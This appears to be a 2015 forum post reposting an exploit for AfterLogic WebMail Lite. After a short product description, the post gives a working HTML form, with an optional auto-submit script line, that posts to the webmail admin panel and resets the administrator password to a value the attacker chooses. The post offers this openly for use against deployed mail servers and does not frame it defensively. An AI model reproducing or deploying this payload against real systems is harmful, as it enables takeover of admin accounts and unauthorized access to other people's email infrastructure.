KhiZaRix Posted March 28, 2015 Report Posted March 28, 2015 AfterLogic WebMail Lite is a free web-based IMAP and SMTP email-clientwith Ajax interface. AfterLogic WebMail Lite is available for both PHPand ASP.NET platforms.The version of AfterLogic WebMail Lite that is written in PHP is freeand open-source software subject to the terms of the Affero GeneralPublic License (AGPL) version 3. The version written in ASP.NET isproprietary software available as freeware.And is deployed over 5/20 mailsevers, quite popular.This exploit attempts to exploit the admin and get(s) us a newpassword to the admin panel which should be located atsite.com/mail/adminpanel/index.php<h2>After Logic Mail - Change Admin Password Exploit</h2><form action="http://localhost/webmail/adminpanel/index.php?submit"method="POST" id="security_form"><input type="hidden" name="form_id" value="security"><input type="text" class="wm_input" name="txtUserName"id="txtUserName" value="mailadm" size="30" /><input type="password" class="wm_input" name="txtNewPassword"id="txtNewPassword" value="newpass" size="30" /><input type="password" class="wm_input" name="txtConfirmNewPassword"id="txtConfirmNewPassword" value="newpass" size="30" /><input type="submit" name="submit_btn" value="Save" id="automate"></form><script>//uncomment the second line for automation//document.getElementById('automate').click();</script>Source: http://dl.packetstormsecurity.net/1503-exploits/afterlogic-bypass.txt Quote
.thumb.jpg.29b1f7ae7dd9ad5a11e41a710722ba35.jpg)